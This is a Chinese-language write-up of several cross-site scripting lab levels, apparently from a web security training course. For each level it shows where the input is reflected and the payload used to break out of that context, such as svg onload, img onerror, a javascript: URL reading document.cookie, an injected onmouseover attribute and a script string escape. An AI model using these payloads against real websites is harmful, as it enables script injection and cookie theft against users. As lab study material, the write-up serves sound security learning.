第三关 "><svg onload=alert(1)>
- 首先在搜索框中输入xx,f12查看元素,找到相关xx出现的地方进行分析,发现其出现在一个img标签内
<img src="/resources/images/tracker.gif?searchTerms=xx">
我们先进行闭合:
"><svg onload=alert(1)>
第四关:<img src=1 onerror=alert(1)>
首先也是在搜索框录入aaaa,f12查看出现位置如下:
<span id="searchMessage">aaaaaaa</span>
搜索框录入:<img src=1 onerror=alert(1)>
该src属性的值无效并引发错误。这会触发onerror事件处理程序,然后调用该alert()函数。因此,每当用户的浏览器尝试加载包含恶意帖子的页面时,就会执行有效负载。
搜索后,f12查看如下:
<span id="searchMessage"><img src="1" onerror="alert(123)"></span>
第五关:javascript:alert(document.cookie)
在提交反馈页面上,将查询参数更改returnPath为/后跟随机字母数字字符串。
右键单击并检查该元素,并观察您的随机字符串已放置在 ahref属性内。
改成returnPath:
javascript:alert(document.cookie)
按 Enter 键并单击“返回”。
<div class="is-linkback">
<a id="backLink" href="javascript:alert(document.cookie)">Back</a>
</div>
点击页面的back触发
第七关:"onmouseover="alert(1)
第七关会对><进行html编码,我们录入aaa查看,其出现在input标签的带引号的属性值中,于是创造一个onmouseover属性,鼠标移动到其上调用属性值
前面的引号是为了闭合前面的属性值
"onmouseover="alert(1)
第九关:';alert(1);//
录入aaaa查询其出现的位置,我们看到如下的位置:
<script>
var searchTerms = 'aaaa';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
所以我们录入';alert(1);//
查询后f12结果就变成这样:
<script>
var searchTerms = '';
alert(1);//';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">')
</script>